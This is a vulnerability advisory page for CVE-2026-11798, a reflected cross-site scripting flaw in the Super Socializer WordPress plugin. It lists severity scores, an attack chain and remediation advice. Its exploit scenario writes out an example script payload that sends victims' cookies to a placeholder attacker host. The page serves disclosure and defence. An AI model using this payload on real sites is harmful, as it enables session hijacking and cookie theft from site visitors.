Skip to main content

Super Socializer CVE-2026-11798

| EUVDEUVD-2026-42168 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-07-08 Wordfence GHSA-4f3m-h538-6f53
6.1
CVSS 3.1 · Vendor: Wordfence
Share

Severity by source

Vendor (Wordfence) PRIMARY
6.1 MEDIUM
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
vuln.today AI
6.1 MEDIUM

Network-delivered reflected XSS requires no privileges (PR:N) but mandatory victim click (UI:R); scope changes to victim's browser (S:C) with limited confidentiality and integrity impact; no availability impact.

3.1 AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (Wordfence).

CVSS VectorVendor: Wordfence

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Analysis Generated
Jul 08, 2026 - 06:35 vuln.today
CVE Published
Jul 08, 2026 - 05:34 nvd
MEDIUM 6.1

DescriptionCVE.org

The Social Share, Social Login and Social Comments Plugin - Super Socializer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'heateor_mastodon_share' parameter in all versions up to, and including, 7.14.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

AnalysisAI

Reflected Cross-Site Scripting in the Super Socializer WordPress plugin (versions up to and including 7.14.5) enables unauthenticated remote attackers to inject arbitrary JavaScript via the unsanitized 'heateor_mastodon_share' parameter, discovered and reported by Wordfence with source-level confirmation at helper.php lines 1243-1246. Successful exploitation requires social engineering a victim into clicking a crafted URL, after which the payload executes within the victim's browser session in the context of the target WordPress site. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Craft malicious URL with XSS payload in 'heateor_mastodon_share' parameter
Delivery
Deliver link to victim via phishing or social engineering
Exploit
Victim clicks crafted URL on affected WordPress site
Execution
Server reflects unsanitized parameter into HTTP response
Persist
Injected script executes in victim's browser session
Impact
Exfiltrate session cookies or hijack authenticated session

Vulnerability AssessmentAI

Exploitation The Mastodon share feature of the Super Socializer plugin must be active and the plugin version must be 7.14.5 or earlier on the target WordPress installation. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N yields a base score of 6.1 (Medium). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker constructs a URL targeting an affected WordPress site, embedding a JavaScript payload in the 'heateor_mastodon_share' GET parameter (e.g., appending ?heateor_mastodon_share=<script>document.location='https://attacker.tld/steal?c='+document.cookie</script> to a share endpoint). The attacker distributes this link via phishing email or a social media post, tricking a site visitor or administrator into clicking it; upon page load, the unsanitized parameter is reflected into the HTML response and the injected script executes in the victim's browser, stealing session cookies or performing actions under the victim's identity. …
Remediation Patch available per vendor advisory - update the Super Socializer plugin to a version beyond 7.14.5 as soon as a patched release is published; the exact fix version is not confirmed in available data, so monitor the WordPress plugin repository and the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/37d9171d-4722-4ebc-a773-9fd497bc12cf for release confirmation. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-11798 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy